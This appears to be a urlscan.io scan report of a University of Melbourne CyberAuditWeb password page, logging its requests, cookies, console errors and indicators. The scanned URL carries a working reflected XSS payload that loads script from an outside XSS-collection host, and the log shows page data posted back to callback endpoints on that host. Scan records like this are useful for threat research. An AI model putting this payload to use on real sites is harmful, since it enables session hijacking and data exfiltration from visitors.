cyberkey-web.unimelb.edu.au Open in urlscan Pro
128.250.83.171  Public Scan

0 Outgoing links

These are links going to different origins than the main page.

Redirected requests

There were HTTP redirect chains for the following requests:

11 HTTP transactions Everything HTML Script AJAX CSS Image Expand all
1 data transactions

Method Protocol	Status	Resource Path	Size x-fer	Time Latency	Type MIME-Type	IP Location
GET H/1.1	200 OK	Primary Request Password.do Show response cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/	982 B 1 KB	4221ms 2082ms	Document text/html	128.250.83.171 UNIMELB-AS-AP The...
General Check archive.org Show headers Download Go to Full URL https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Protocol HTTP/1.1 Security TLS 1.2, ECDHE_RSA, AES_256_GCM Server 128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU), Reverse DNS sec-srv-eka-vm.pb.unimelb.edu.au Software nginx / Resource Hash 615533b7e17a85636d919e0e48c154c5afe0a8a09609b5508fd0084b0e084f50 Security Headers Name Value X-Content-Type-Options nosniff X-Frame-Options DENY Request headers Upgrade-Insecure-Requests 1 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 accept-language de-DE,de;q=0.9 Response headers Connection keep-alive Content-Length 982 Content-Type text/html;charset=UTF-8 Date Thu, 12 May 2022 05:54:38 GMT Server nginx X-Content-Type-Options nosniff X-Frame-Options DENY
GET H/1.1	200 OK	default.css cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/	191 B 461 B	2950ms 2950ms	Stylesheet text/css	128.250.83.171 UNIMELB-AS-AP The...
General Check archive.org Show headers Download Go to Full URL https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css Requested by Host: cyberkey-web.unimelb.edu.au URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Protocol HTTP/1.1 Security TLS 1.2, ECDHE_RSA, AES_256_GCM Server 128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU), Reverse DNS sec-srv-eka-vm.pb.unimelb.edu.au Software nginx / Resource Hash 62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9 Security Headers Name Value X-Content-Type-Options nosniff Request headers accept-language de-DE,de;q=0.9 Referer https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Response headers Date Thu, 12 May 2022 05:54:41 GMT X-Content-Type-Options nosniff Last-Modified Tue, 09 Oct 2018 02:21:48 GMT Server nginx ETag W/"191-1539051708000" Content-Type text/css Connection keep-alive Accept-Ranges bytes Content-Length 191
GET H/1.1	200 OK	/ Show response lgmso.xss.ht/	451 KB 452 KB	433ms 207ms	Script application/x-javascript	52.70.162.23 AMAZON-AES
General Check archive.org Show headers Download Go to Full URL https://lgmso.xss.ht/ Requested by Host: cyberkey-web.unimelb.edu.au URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Protocol HTTP/1.1 Security TLS 1.2, ECDHE_RSA, AES_256_GCM Server 52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US), Reverse DNS ec2-52-70-162-23.compute-1.amazonaws.com Software nginx/1.14.0 (Ubuntu) / Resource Hash 7d8184041fc1d90491cb20698cf6249228b257718099b0c5f8e2429674e0c4f5 Security Headers Name Value Content-Security-Policy default-src 'self' Strict-Transport-Security max-age=31536000; includeSubDomains; preload X-Content-Type-Options nosniff X-Frame-Options deny X-Xss-Protection 1; mode=block Request headers accept-language de-DE,de;q=0.9 Referer https://cyberkey-web.unimelb.edu.au:8443/ User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Response headers Content-Security-Policy default-src 'self' X-Content-Type-Options nosniff Connection keep-alive Content-Length 461702 X-Xss-Protection 1; mode=block Pragma no-cache Server nginx/1.14.0 (Ubuntu) X-Frame-Options deny Date Thu, 12 May 2022 05:54:49 GMT Strict-Transport-Security max-age=31536000; includeSubDomains; preload Access-Control-Allow-Methods OPTIONS, PUT, DELETE, POST, GET Content-Type application/x-javascript Access-Control-Allow-Origin * Cache-Control no-cache, no-store, must-revalidate Access-Control-Allow-Credentials true Access-Control-Allow-Headers X-Requested-With, Content-Type, Origin, Authorization, Accept, Accept-Encoding Expires 0
GET H/1.1	200 OK	default.css cyberkey-web.unimelb.edu.au/CyberAuditWeb/mobile/ Frame 2288	191 B 461 B	2173ms 2173ms	Stylesheet text/css	128.250.83.171 UNIMELB-AS-AP The...
General Check archive.org Show headers Download Go to Full URL https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/default.css Requested by Host: lgmso.xss.ht URL: https://lgmso.xss.ht/ Protocol HTTP/1.1 Security TLS 1.2, ECDHE_RSA, AES_256_GCM Server 128.250.83.171 Melbourne, Australia, ASN10148 (UNIMELB-AS-AP The University of Melbourne, Melbourne, Victoria, AU), Reverse DNS sec-srv-eka-vm.pb.unimelb.edu.au Software nginx / Resource Hash 62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9 Security Headers Name Value X-Content-Type-Options nosniff Request headers accept-language de-DE,de;q=0.9 Referer https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Response headers Date Thu, 12 May 2022 05:54:43 GMT X-Content-Type-Options nosniff Last-Modified Tue, 09 Oct 2018 02:21:48 GMT Server nginx ETag W/"191-1539051708000" Content-Type text/css Connection keep-alive Accept-Ranges bytes Content-Length 191
GET DATA	200 OK	truncated /	42 B 0		Image image/gif
General Check archive.org Show headers Download Go to Show image Full URL data:truncated Protocol DATA Server -, , ASN (), Reverse DNS Software / Resource Hash ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629 Request headers accept-language de-DE,de;q=0.9 Referer User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Response headers Content-Type image/gif
POST H/1.1	200 OK	js_callback Show response lgmso.xss.ht/	2 B 637 B	639ms 249ms	XHR application/x-javascript	52.70.162.23 AMAZON-AES
General Check archive.org Show headers Download Go to Full URL https://lgmso.xss.ht/js_callback Requested by Host: lgmso.xss.ht URL: https://lgmso.xss.ht/ Protocol HTTP/1.1 Security TLS 1.2, ECDHE_RSA, AES_256_GCM Server 52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US), Reverse DNS ec2-52-70-162-23.compute-1.amazonaws.com Software nginx/1.14.0 (Ubuntu) / Resource Hash 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a Security Headers Name Value Content-Security-Policy default-src 'self' Strict-Transport-Security max-age=31536000; includeSubDomains; preload X-Content-Type-Options nosniff X-Frame-Options deny X-Xss-Protection 1; mode=block Request headers Referer https://cyberkey-web.unimelb.edu.au:8443/ accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Content-type text/plain Response headers Content-Security-Policy default-src 'self' X-Content-Type-Options nosniff Connection keep-alive Content-Length 2 X-Xss-Protection 1; mode=block Pragma no-cache Server nginx/1.14.0 (Ubuntu) X-Frame-Options deny Date Thu, 12 May 2022 05:54:55 GMT Strict-Transport-Security max-age=31536000; includeSubDomains; preload Access-Control-Allow-Methods POST, GET, HEAD, OPTIONS Content-Type application/x-javascript Access-Control-Allow-Origin * Cache-Control no-cache, no-store, must-revalidate Access-Control-Allow-Credentials true Access-Control-Allow-Headers X-Requested-With Expires 0
GET		crossdomain.xml cyberkey-web.unimelb.edu.au/	0 0
GET		clientaccesspolicy.xml cyberkey-web.unimelb.edu.au/	0 0
GET		robots.txt cyberkey-web.unimelb.edu.au/	0 0
POST H/1.1	200 OK	page_callback Show response lgmso.xss.ht/	130 B 767 B	107ms 107ms	XHR application/x-javascript	52.70.162.23 AMAZON-AES
General Check archive.org Show headers Download Go to Full URL https://lgmso.xss.ht/page_callback Requested by Host: lgmso.xss.ht URL: https://lgmso.xss.ht/ Protocol HTTP/1.1 Security TLS 1.2, ECDHE_RSA, AES_256_GCM Server 52.70.162.23 Ashburn, United States, ASN14618 (AMAZON-AES, US), Reverse DNS ec2-52-70-162-23.compute-1.amazonaws.com Software nginx/1.14.0 (Ubuntu) / Resource Hash 65cb608eeb07ed75f0e090e1385c429e0a971c26e98042658d2b78f1aa70e6e6 Security Headers Name Value Content-Security-Policy default-src 'self' Strict-Transport-Security max-age=31536000; includeSubDomains; preload X-Content-Type-Options nosniff X-Frame-Options deny X-Xss-Protection 1; mode=block Request headers Referer https://cyberkey-web.unimelb.edu.au:8443/ accept-language de-DE,de;q=0.9 User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Content-type text/plain Response headers Content-Security-Policy default-src 'self' X-Content-Type-Options nosniff Connection keep-alive Content-Length 130 X-Xss-Protection 1; mode=block Pragma no-cache Server nginx/1.14.0 (Ubuntu) X-Frame-Options deny Date Thu, 12 May 2022 05:54:56 GMT Strict-Transport-Security max-age=31536000; includeSubDomains; preload Access-Control-Allow-Methods POST, GET, HEAD, OPTIONS Content-Type application/x-javascript Access-Control-Allow-Origin * Cache-Control no-cache, no-store, must-revalidate Access-Control-Allow-Credentials true Access-Control-Allow-Headers X-Requested-With Expires 0
POST		page_callback lgmso.xss.ht/	0 0
POST		page_callback lgmso.xss.ht/	0 0

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain

cyberkey-web.unimelb.edu.au

URL

https://cyberkey-web.unimelb.edu.au/crossdomain.xml

Domain

cyberkey-web.unimelb.edu.au

URL

https://cyberkey-web.unimelb.edu.au/clientaccesspolicy.xml

Domain

cyberkey-web.unimelb.edu.au

URL

https://cyberkey-web.unimelb.edu.au/robots.txt

Domain

lgmso.xss.ht

URL

https://lgmso.xss.ht/page_callback

Domain

lgmso.xss.ht

URL

https://lgmso.xss.ht/page_callback

22 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| oncontextlost object| oncontextrestored function| structuredClone function| getScreenDetails string| pgp_key string| pgp_email_template string| chainload_uri object| collect_page_list function| generate_pgp_encrypted_email function| get_guid function| never_null function| contact_mothership function| send_collected_page function| collect_page_data function| collect_pages function| eval_remote_source function| addEvent function| hook_load_if_not_ready function| finishing_moves function| html2canvas object| openpgp object| probe_return_data

1 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

			Domain/Path	Expires	Name / Value
			cyberkey-web.unimelb.edu.au/CyberAuditWeb	1969-12-31 23:59:59	Name: JSESSIONID Value: 68162FC8D4F870FD3A52240B9FDE96F7

6 Console Messages

A page may trigger messages to the console to be logged. These are often error messages about being unable to load a resource or execute a piece of JavaScript. Sometimes they also provide insight into the technology behind a website.

Source	Level	URL Text
javascript	error	URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Message: Access to XMLHttpRequest at 'https://cyberkey-web.unimelb.edu.au/crossdomain.xml' from origin 'https://cyberkey-web.unimelb.edu.au:8443' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
network	error	URL: https://cyberkey-web.unimelb.edu.au/crossdomain.xml Message: Failed to load resource: net::ERR_FAILED
javascript	error	URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Message: Access to XMLHttpRequest at 'https://cyberkey-web.unimelb.edu.au/clientaccesspolicy.xml' from origin 'https://cyberkey-web.unimelb.edu.au:8443' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
network	error	URL: https://cyberkey-web.unimelb.edu.au/clientaccesspolicy.xml Message: Failed to load resource: net::ERR_FAILED
javascript	error	URL: https://cyberkey-web.unimelb.edu.au:8443/CyberAuditWeb/mobile/Password.do?account=%22%3E%3Cscript%20src=https://lgmso.xss.ht%3E%3C/script%3E%3C Message: Access to XMLHttpRequest at 'https://cyberkey-web.unimelb.edu.au/robots.txt' from origin 'https://cyberkey-web.unimelb.edu.au:8443' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.
network	error	URL: https://cyberkey-web.unimelb.edu.au/robots.txt Message: Failed to load resource: net::ERR_FAILED

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header	Value
X-Content-Type-Options	nosniff
X-Frame-Options	DENY

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

cyberkey-web.unimelb.edu.au
lgmso.xss.ht
cyberkey-web.unimelb.edu.au
lgmso.xss.ht
128.250.83.171
52.70.162.23
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
615533b7e17a85636d919e0e48c154c5afe0a8a09609b5508fd0084b0e084f50
62c1258ef7b635abe60e8c151f08ebaa5300eaacd85ad84640ffdb24cd1164e9
65cb608eeb07ed75f0e090e1385c429e0a971c26e98042658d2b78f1aa70e6e6
7d8184041fc1d90491cb20698cf6249228b257718099b0c5f8e2429674e0c4f5
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629